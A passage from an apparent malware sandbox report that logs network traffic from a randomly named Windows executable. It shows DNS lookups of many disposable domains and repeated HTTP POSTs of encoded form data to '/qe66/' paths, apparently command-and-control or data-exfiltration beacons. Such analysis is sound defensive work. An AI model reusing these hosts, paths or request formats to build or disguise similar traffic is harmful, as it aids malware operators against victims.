Aug 29, 2024 05:26:31.350608110 CEST	49771	80	192.168.2.4	172.67.210.102
Aug 29, 2024 05:26:32.365447044 CEST	49772	80	192.168.2.4	172.67.210.102
Aug 29, 2024 05:26:32.370322943 CEST	80	49772	172.67.210.102	192.168.2.4
Aug 29, 2024 05:26:32.375554085 CEST	49772	80	192.168.2.4	172.67.210.102
Aug 29, 2024 05:26:32.375554085 CEST	49772	80	192.168.2.4	172.67.210.102
Aug 29, 2024 05:26:32.380573988 CEST	80	49772	172.67.210.102	192.168.2.4
Aug 29, 2024 05:26:32.380590916 CEST	80	49772	172.67.210.102	192.168.2.4
Aug 29, 2024 05:26:32.380600929 CEST	80	49772	172.67.210.102	192.168.2.4
Aug 29, 2024 05:26:32.380609035 CEST	80	49772	172.67.210.102	192.168.2.4
Aug 29, 2024 05:26:32.380618095 CEST	80	49772	172.67.210.102	192.168.2.4
Aug 29, 2024 05:26:32.380706072 CEST	80	49772	172.67.210.102	192.168.2.4
Aug 29, 2024 05:26:32.380717039 CEST	80	49772	172.67.210.102	192.168.2.4
Aug 29, 2024 05:26:32.380774021 CEST	80	49772	172.67.210.102	192.168.2.4
Aug 29, 2024 05:26:32.380784035 CEST	80	49772	172.67.210.102	192.168.2.4
Aug 29, 2024 05:26:33.892219067 CEST	49772	80	192.168.2.4	172.67.210.102
Aug 29, 2024 05:26:33.897286892 CEST	80	49772	172.67.210.102	192.168.2.4
Aug 29, 2024 05:26:33.897356033 CEST	49772	80	192.168.2.4	172.67.210.102
Aug 29, 2024 05:26:34.911622047 CEST	49773	80	192.168.2.4	172.67.210.102
Aug 29, 2024 05:26:34.916544914 CEST	80	49773	172.67.210.102	192.168.2.4
Aug 29, 2024 05:26:34.919632912 CEST	49773	80	192.168.2.4	172.67.210.102
Aug 29, 2024 05:26:34.923504114 CEST	49773	80	192.168.2.4	172.67.210.102
Aug 29, 2024 05:26:34.928591013 CEST	80	49773	172.67.210.102	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 29, 2024 05:23:26.716037035 CEST	59086	53	192.168.2.4	1.1.1.1
Aug 29, 2024 05:23:26.742382050 CEST	53	59086	1.1.1.1	192.168.2.4
Aug 29, 2024 05:23:42.538435936 CEST	62422	53	192.168.2.4	1.1.1.1
Aug 29, 2024 05:23:42.552211046 CEST	53	62422	1.1.1.1	192.168.2.4
Aug 29, 2024 05:23:56.113692045 CEST	49451	53	192.168.2.4	1.1.1.1
Aug 29, 2024 05:23:56.123224974 CEST	53	49451	1.1.1.1	192.168.2.4
Aug 29, 2024 05:24:04.176487923 CEST	51917	53	192.168.2.4	1.1.1.1
Aug 29, 2024 05:24:04.185450077 CEST	53	51917	1.1.1.1	192.168.2.4
Aug 29, 2024 05:24:12.254466057 CEST	51829	53	192.168.2.4	1.1.1.1
Aug 29, 2024 05:24:12.500535011 CEST	53	51829	1.1.1.1	192.168.2.4
Aug 29, 2024 05:24:27.240808010 CEST	49649	53	192.168.2.4	1.1.1.1
Aug 29, 2024 05:24:27.249495983 CEST	53	49649	1.1.1.1	192.168.2.4
Aug 29, 2024 05:24:35.318216085 CEST	59589	53	192.168.2.4	1.1.1.1
Aug 29, 2024 05:24:36.315004110 CEST	59589	53	192.168.2.4	1.1.1.1
Aug 29, 2024 05:24:37.217724085 CEST	53	59589	1.1.1.1	192.168.2.4
Aug 29, 2024 05:24:37.217739105 CEST	53	59589	1.1.1.1	192.168.2.4
Aug 29, 2024 05:24:50.709111929 CEST	51248	53	192.168.2.4	1.1.1.1
Aug 29, 2024 05:24:50.801456928 CEST	53	51248	1.1.1.1	192.168.2.4
Aug 29, 2024 05:25:04.087202072 CEST	62556	53	192.168.2.4	1.1.1.1
Aug 29, 2024 05:25:04.528989077 CEST	53	62556	1.1.1.1	192.168.2.4
Aug 29, 2024 05:25:38.895239115 CEST	61230	53	192.168.2.4	1.1.1.1
Aug 29, 2024 05:25:38.923819065 CEST	53	61230	1.1.1.1	192.168.2.4
Aug 29, 2024 05:25:52.287786007 CEST	62856	53	192.168.2.4	1.1.1.1
Aug 29, 2024 05:25:52.383357048 CEST	53	62856	1.1.1.1	192.168.2.4
Aug 29, 2024 05:26:05.827428102 CEST	58143	53	192.168.2.4	1.1.1.1
Aug 29, 2024 05:26:05.865257978 CEST	53	58143	1.1.1.1	192.168.2.4
Aug 29, 2024 05:26:19.224339008 CEST	51821	53	192.168.2.4	1.1.1.1
Aug 29, 2024 05:26:19.233886957 CEST	53	51821	1.1.1.1	192.168.2.4
Aug 29, 2024 05:26:27.286320925 CEST	58797	53	192.168.2.4	1.1.1.1
Aug 29, 2024 05:26:27.297863007 CEST	53	58797	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 29, 2024 05:23:26.716037035 CEST	192.168.2.4	1.1.1.1	0x5192	Standard query (0)	www.hprlz.cz	A (IP address)	IN (0x0001)	false
Aug 29, 2024 05:23:42.538435936 CEST	192.168.2.4	1.1.1.1	0x33cb	Standard query (0)	www.catherineviskadi.com	A (IP address)	IN (0x0001)	false
Aug 29, 2024 05:23:56.113692045 CEST	192.168.2.4	1.1.1.1	0x5b72	Standard query (0)	www.hatercoin.online	A (IP address)	IN (0x0001)	false
Aug 29, 2024 05:24:04.176487923 CEST	192.168.2.4	1.1.1.1	0x1433	Standard query (0)	www.fourgrouw.cfd	A (IP address)	IN (0x0001)	false
Aug 29, 2024 05:24:12.254466057 CEST	192.168.2.4	1.1.1.1	0xc1e4	Standard query (0)	www.bfiworkerscomp.com	A (IP address)	IN (0x0001)	false
Aug 29, 2024 05:24:27.240808010 CEST	192.168.2.4	1.1.1.1	0xaf32	Standard query (0)	www.tinmapco.com	A (IP address)	IN (0x0001)	false
Aug 29, 2024 05:24:35.318216085 CEST	192.168.2.4	1.1.1.1	0xfd99	Standard query (0)	www.xn--fhq1c541j0zr.com	A (IP address)	IN (0x0001)	false
Aug 29, 2024 05:24:36.315004110 CEST	192.168.2.4	1.1.1.1	0xfd99	Standard query (0)	www.xn--fhq1c541j0zr.com	A (IP address)	IN (0x0001)	false
Aug 29, 2024 05:24:50.709111929 CEST	192.168.2.4	1.1.1.1	0x144	Standard query (0)	www.xn--matfrmn-jxa4m.se	A (IP address)	IN (0x0001)	false
Aug 29, 2024 05:25:04.087202072 CEST	192.168.2.4	1.1.1.1	0xb745	Standard query (0)	www.anuts.top	A (IP address)	IN (0x0001)	false
Aug 29, 2024 05:25:38.895239115 CEST	192.168.2.4	1.1.1.1	0x67ce	Standard query (0)	www.telwisey.info	A (IP address)	IN (0x0001)	false
Aug 29, 2024 05:25:52.287786007 CEST	192.168.2.4	1.1.1.1	0x657b	Standard query (0)	www.sandranoll.com	A (IP address)	IN (0x0001)	false
Aug 29, 2024 05:26:05.827428102 CEST	192.168.2.4	1.1.1.1	0xfbee	Standard query (0)	www.gipsytroya.com	A (IP address)	IN (0x0001)	false
Aug 29, 2024 05:26:19.224339008 CEST	192.168.2.4	1.1.1.1	0x70fa	Standard query (0)	www.helpers-lion.online	A (IP address)	IN (0x0001)	false
Aug 29, 2024 05:26:27.286320925 CEST	192.168.2.4	1.1.1.1	0xb70e	Standard query (0)	www.dmtxwuatbz.cc	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 29, 2024 05:23:26.742382050 CEST	1.1.1.1	192.168.2.4	0x5192	No error (0)	www.hprlz.cz		5.44.111.162	A (IP address)	IN (0x0001)	false
Aug 29, 2024 05:23:42.552211046 CEST	1.1.1.1	192.168.2.4	0x33cb	No error (0)	www.catherineviskadi.com		217.160.0.106	A (IP address)	IN (0x0001)	false
Aug 29, 2024 05:23:56.123224974 CEST	1.1.1.1	192.168.2.4	0x5b72	Name error (3)	www.hatercoin.online	none	none	A (IP address)	IN (0x0001)	false
Aug 29, 2024 05:24:04.185450077 CEST	1.1.1.1	192.168.2.4	0x1433	Name error (3)	www.fourgrouw.cfd	none	none	A (IP address)	IN (0x0001)	false
Aug 29, 2024 05:24:12.500535011 CEST	1.1.1.1	192.168.2.4	0xc1e4	No error (0)	www.bfiworkerscomp.com		208.91.197.27	A (IP address)	IN (0x0001)	false
Aug 29, 2024 05:24:27.249495983 CEST	1.1.1.1	192.168.2.4	0xaf32	Name error (3)	www.tinmapco.com	none	none	A (IP address)	IN (0x0001)	false
Aug 29, 2024 05:24:37.217724085 CEST	1.1.1.1	192.168.2.4	0xfd99	No error (0)	www.xn--fhq1c541j0zr.com		43.252.167.188	A (IP address)	IN (0x0001)	false
Aug 29, 2024 05:24:37.217739105 CEST	1.1.1.1	192.168.2.4	0xfd99	No error (0)	www.xn--fhq1c541j0zr.com		43.252.167.188	A (IP address)	IN (0x0001)	false
Aug 29, 2024 05:24:50.801456928 CEST	1.1.1.1	192.168.2.4	0x144	No error (0)	www.xn--matfrmn-jxa4m.se		194.9.94.85	A (IP address)	IN (0x0001)	false
Aug 29, 2024 05:24:50.801456928 CEST	1.1.1.1	192.168.2.4	0x144	No error (0)	www.xn--matfrmn-jxa4m.se		194.9.94.86	A (IP address)	IN (0x0001)	false
Aug 29, 2024 05:25:04.528989077 CEST	1.1.1.1	192.168.2.4	0xb745	No error (0)	www.anuts.top		23.251.54.212	A (IP address)	IN (0x0001)	false
Aug 29, 2024 05:25:38.923819065 CEST	1.1.1.1	192.168.2.4	0x67ce	No error (0)	www.telwisey.info		199.192.19.19	A (IP address)	IN (0x0001)	false
Aug 29, 2024 05:25:52.383357048 CEST	1.1.1.1	192.168.2.4	0x657b	No error (0)	www.sandranoll.com		213.145.228.16	A (IP address)	IN (0x0001)	false
Aug 29, 2024 05:26:05.865257978 CEST	1.1.1.1	192.168.2.4	0xfbee	No error (0)	www.gipsytroya.com	parkingpage.namecheap.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 29, 2024 05:26:05.865257978 CEST	1.1.1.1	192.168.2.4	0xfbee	No error (0)	parkingpage.namecheap.com		91.195.240.19	A (IP address)	IN (0x0001)	false
Aug 29, 2024 05:26:19.233886957 CEST	1.1.1.1	192.168.2.4	0x70fa	Name error (3)	www.helpers-lion.online	none	none	A (IP address)	IN (0x0001)	false
Aug 29, 2024 05:26:27.297863007 CEST	1.1.1.1	192.168.2.4	0xb70e	No error (0)	www.dmtxwuatbz.cc		172.67.210.102	A (IP address)	IN (0x0001)	false
Aug 29, 2024 05:26:27.297863007 CEST	1.1.1.1	192.168.2.4	0xb70e	No error (0)	www.dmtxwuatbz.cc		104.21.45.56	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.hprlz.cz

www.catherineviskadi.com

www.bfiworkerscomp.com

www.xn--fhq1c541j0zr.com

www.xn--matfrmn-jxa4m.se

www.anuts.top

www.telwisey.info

www.sandranoll.com

www.gipsytroya.com

www.dmtxwuatbz.cc

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	5.44.111.162	80	2840	C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 05:23:26.754905939 CEST	498	OUT	GET /w6qg/?DnUL=_290s&kbRxoVY0=0lpTRQcDUH+iEsGyb7K93jJ3AkchBc2e7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CayhJ+NIkCDL9/8P53q6zBNKDHtjSuHiPb7bo= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Host: www.hprlz.cz Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Aug 29, 2024 05:23:27.421891928 CEST	729	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Thu, 29 Aug 2024 03:23:27 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 379 Connection: close Location: https://www.hprlz.cz/w6qg/?DnUL=_290s&kbRxoVY0=0lpTRQcDUH+iEsGyb7K93jJ3AkchBc2e7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CayhJ+NIkCDL9/8P53q6zBNKDHtjSuHiPb7bo= Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 70 72 6c 7a 2e 63 7a 2f 77 36 71 67 2f 3f 44 6e 55 4c 3d 5f 32 39 30 73 26 61 6d 70 3b 6b 62 52 78 6f 56 59 30 3d 30 6c 70 54 52 51 63 44 55 48 2b 69 45 73 47 79 62 37 4b 39 33 6a 4a 33 41 6b 63 68 42 63 32 65 37 5a 2f 78 75 4e 6d 54 67 64 6c 69 39 72 70 4f 55 47 79 58 69 7a 6a 35 63 51 39 58 78 43 34 73 6f 38 34 46 4e 70 46 52 39 74 78 58 78 6d 30 74 71 31 43 61 79 68 4a 2b 4e 49 6b 43 44 4c 39 2f 38 50 35 33 71 36 7a 42 4e 4b 44 48 74 6a [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.hprlz.cz/w6qg/?DnUL=_290s&kbRxoVY0=0lpTRQcDUH+iEsGyb7K93jJ3AkchBc2e7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CayhJ+NIkCDL9/8P53q6zBNKDHtjSuHiPb7bo=">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	217.160.0.106	80	2840	C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 05:23:42.625318050 CEST	796	OUT	POST /qe66/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.catherineviskadi.com Origin: http://www.catherineviskadi.com Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 205 Referer: http://www.catherineviskadi.com/qe66/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 6b 62 52 78 6f 56 59 30 3d 51 6c 48 72 66 70 53 50 44 67 78 66 5a 61 63 2b 51 6c 4e 41 73 53 42 46 62 6e 77 79 33 61 2b 72 64 6c 56 6d 4d 4e 6b 2b 49 4c 37 5a 59 72 47 4d 46 70 61 4c 66 35 6f 76 69 35 4c 39 78 6f 56 57 4f 43 42 46 78 67 58 30 61 6d 6f 4f 34 53 4c 4e 42 54 7a 6f 6f 67 61 42 6a 62 71 48 52 2b 64 78 37 67 4a 62 61 31 71 68 6a 75 57 6d 54 6f 68 6f 6b 54 4f 4e 33 6a 7a 34 4d 74 44 52 37 4b 31 73 77 67 44 6b 79 37 66 4c 71 67 65 56 52 48 69 38 6a 47 37 78 31 79 48 35 32 6f 75 51 55 4c 6e 52 37 55 78 6c 46 66 58 56 4f 54 51 50 44 66 58 7a 61 2b 36 4f 5a 53 54 41 44 36 6b 79 56 41 65 71 65 51 3d 3d Data Ascii: kbRxoVY0=QlHrfpSPDgxfZac+QlNAsSBFbnwy3a+rdlVmMNk+IL7ZYrGMFpaLf5ovi5L9xoVWOCBFxgX0amoO4SLNBTzoogaBjbqHR+dx7gJba1qhjuWmTohokTON3jz4MtDR7K1swgDky7fLqgeVRHi8jG7x1yH52ouQULnR7UxlFfXVOTQPDfXza+6OZSTAD6kyVAeqeQ==
Aug 29, 2024 05:23:43.264993906 CEST	580	IN	HTTP/1.1 404 Not Found Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Thu, 29 Aug 2024 03:23:43 GMT Server: Apache Content-Encoding: gzip Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED] Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R\|V}cplxXU*!6pBNI+MteRFSYj[7\|QqY3k\|G;,^{NPPouvw2O7.e(O~Nt^,G\|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49738	217.160.0.106	80	2840	C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 05:23:45.232196093 CEST	816	OUT	POST /qe66/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.catherineviskadi.com Origin: http://www.catherineviskadi.com Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 225 Referer: http://www.catherineviskadi.com/qe66/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 6b 62 52 78 6f 56 59 30 3d 51 6c 48 72 66 70 53 50 44 67 78 66 44 2f 55 2b 54 47 6c 41 35 43 42 43 48 33 77 79 2b 36 2b 56 64 6c 5a 6d 4d 4d 67 75 4c 34 66 5a 59 4c 32 4d 45 6f 61 4c 63 35 6f 76 70 5a 4c 38 31 6f 56 6e 4f 43 4e 72 78 69 44 30 61 6d 73 4f 34 54 37 4e 42 45 6e 72 72 51 61 44 6f 37 71 46 4d 75 64 78 37 67 4a 62 61 31 75 50 6a 76 2b 6d 51 59 52 6f 6c 79 4f 43 72 54 7a 2f 45 4e 44 52 32 71 31 6f 77 67 44 4b 79 2b 47 75 71 6d 43 56 52 48 53 38 67 54 58 79 38 79 48 37 35 49 76 45 46 71 4b 42 69 46 30 6c 4b 50 44 5a 41 54 45 7a 4c 35 47 70 4c 50 62 5a 4c 53 33 7a 65 39 74 47 59 44 6a 6a 46 61 58 6c 73 79 65 52 6e 4b 2f 32 4a 59 4e 52 32 45 4b 6a 79 72 51 3d Data Ascii: kbRxoVY0=QlHrfpSPDgxfD/U+TGlA5CBCH3wy+6+VdlZmMMguL4fZYL2MEoaLc5ovpZL81oVnOCNrxiD0amsO4T7NBEnrrQaDo7qFMudx7gJba1uPjv+mQYRolyOCrTz/ENDR2q1owgDKy+GuqmCVRHS8gTXy8yH75IvEFqKBiF0lKPDZATEzL5GpLPbZLS3ze9tGYDjjFaXlsyeRnK/2JYNR2EKjyrQ=
Aug 29, 2024 05:23:45.840840101 CEST	580	IN	HTTP/1.1 404 Not Found Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Thu, 29 Aug 2024 03:23:45 GMT Server: Apache Content-Encoding: gzip Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED] Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R\|V}cplxXU*!6pBNI+MteRFSYj[7\|QqY3k\|G;,^{NPPouvw2O7.e(O~Nt^,G\|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49739	217.160.0.106	80	2840	C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 05:23:47.763310909 CEST	10898	OUT	POST /qe66/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.catherineviskadi.com Origin: http://www.catherineviskadi.com Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 10305 Referer: http://www.catherineviskadi.com/qe66/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 6b 62 52 78 6f 56 59 30 3d 51 6c 48 72 66 70 53 50 44 67 78 66 44 2f 55 2b 54 47 6c 41 35 43 42 43 48 33 77 79 2b 36 2b 56 64 6c 5a 6d 4d 4d 67 75 4c 34 58 5a 59 36 57 4d 45 4c 43 4c 64 35 6f 76 6b 35 4c 68 31 6f 56 41 4f 43 46 76 78 69 50 6b 61 67 77 4f 35 78 7a 4e 52 67 4c 72 38 41 61 44 6e 62 71 49 52 2b 63 7a 37 67 5a 66 61 31 2b 50 6a 76 2b 6d 51 61 4a 6f 6c 6a 4f 43 70 54 7a 34 4d 74 44 4e 37 4b 31 41 77 67 37 38 79 36 62 62 72 51 79 56 53 6e 43 38 77 78 50 79 2b 53 48 44 34 49 76 4d 46 71 48 62 69 42 55 54 4b 50 32 32 41 52 59 7a 50 76 48 41 59 63 66 65 63 78 6d 31 41 66 63 69 63 43 58 69 42 4b 54 67 6f 6a 47 36 31 4f 33 43 54 4b 63 4e 69 46 57 38 70 38 63 4e 69 50 53 38 2f 70 6c 66 55 44 56 69 4a 4a 57 52 4e 65 5a 4a 34 68 2b 43 4d 56 4c 32 47 6b 76 57 62 75 51 57 34 68 7a 72 48 44 4b 50 52 47 7a 71 2b 4e 7a 78 4d 65 59 6d 66 73 64 36 36 49 5a 2b 4a 74 64 42 66 4a 57 7a 7a 72 43 4d 63 32 49 67 6c 49 41 59 44 4c 75 4e 69 4c 69 73 47 39 36 72 77 55 69 4b 31 4f 31 4e 64 72 2b 5a 54 56 65 54 41 [TRUNCATED] Data Ascii: kbRxoVY0=QlHrfpSPDgxfD/U+TGlA5CBCH3wy+6+VdlZmMMguL4XZY6WMELCLd5ovk5Lh1oVAOCFvxiPkagwO5xzNRgLr8AaDnbqIR+cz7gZfa1+Pjv+mQaJoljOCpTz4MtDN7K1Awg78y6bbrQyVSnC8wxPy+SHD4IvMFqHbiBUTKP22ARYzPvHAYcfecxm1AfcicCXiBKTgojG61O3CTKcNiFW8p8cNiPS8/plfUDViJJWRNeZJ4h+CMVL2GkvWbuQW4hzrHDKPRGzq+NzxMeYmfsd66IZ+JtdBfJWzzrCMc2IglIAYDLuNiLisG96rwUiK1O1Ndr+ZTVeTAkpsy8N3Z8rD7lcRSzFx9wsgGZssteRr2+8wfmeLQSVInd316fCKzj7ZSx/MmL+7KZAmKuxbX20KqC/UrgjH2QGd49+SJkZtMsCBBlTJxxTR+ss3NtZykLjFEsi6uwKYZm0dPAafUC0eaMjNQzm1xGSoexdOfMVPEplukhxL8jQfFwq6HLfN4iKqJLBlJ77jT0CfOGg8TyycBrggKLk5fY4H724rheygicyuNu9NZVhhWHJZPaKnhHjblfqtQHU76541+e2mV4Xb8NjPIz13kR326M1Rd7kxETl8/axlmDwzkaXnAHYn12oplx7T7vCyxn1sml0cpymgZNGoGvppoYnwLLdmDsQrBhmNAmT+Wo3UzCj8RqWqKE2bg8He7//XPGX4vohdc3ki0XAOJKor4YZrrM4byjsyu1AcU48YJhr33J1vyBq+qz/t0DUXYoXhsZT1+Qu2RLXUQXmoNtfzC8qGGlK/3XRAG31vei16Bil4l3fNfR79BC7Zv/Wk3X6aX5dosNc1hTfAzloltqF7T6tM8Xnr/KGTZ0DPzjfKttuaOGOaWy0tKZy/TLLQA2baUY/e7jYIj4ostkFyMi+lxa0+LOmSZ4x+rwS9hmDaCnNUMaRXwCpU/QyxxFkyhYXDdkvxMCIhO4+wLmd6eYe4BYQuRXS26NQcWO2 [TRUNCATED]
Aug 29, 2024 05:23:48.414019108 CEST	580	IN	HTTP/1.1 404 Not Found Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Thu, 29 Aug 2024 03:23:48 GMT Server: Apache Content-Encoding: gzip Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 